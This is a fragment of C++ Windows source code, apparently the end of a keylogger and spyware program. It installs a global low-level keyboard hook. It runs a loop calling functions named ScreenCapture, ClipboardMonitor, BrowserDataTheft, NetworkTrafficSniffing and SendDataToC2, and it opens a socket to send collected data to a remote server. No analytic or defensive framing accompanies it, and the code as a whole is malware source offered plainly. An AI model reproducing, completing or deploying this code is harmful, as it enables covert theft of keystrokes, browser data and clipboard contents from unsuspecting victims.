    sockaddr_in serverAddr;
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_port = htons(serverPort);
    serverAddr.sin_addr.s_addr = inet_addr(serverIP.c_str());
    connect(sock, (sockaddr*)&serverAddr, sizeof(serverAddr));
    send(sock, request.c_str(), request.size(), 0);
    closesocket(sock);
}

// Main loop
void MainLoop() {
    while (!shouldExit && isLogging) {
        ScreenCapture();
        ClipboardMonitor();
        BrowserDataTheft();
        NetworkTrafficSniffing();
        SendDataToC2();
        Sleep(1000);
    }
}

// Entry point
int main() {
    // Set up the hook
    HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, 0);
    if (!hook) {
        std::cerr << "Failed to set keyboard hook!" << std::endl;
        return 1;
    }

    // Start the main loop
    std::thread mainThread(MainLoop);

    std::cout << "Press Enter to exit..." << std::endl;
    std::cin.get();

    shouldExit = true;
    isLogging = false;

    // Unhook the keyboard
    if (hook) {
        UnhookWindowsHookEx(hook);
    }

    // Join the main thread
    if (mainThread.joinable()) {
        mainThread.join();
    }

    return 0;
}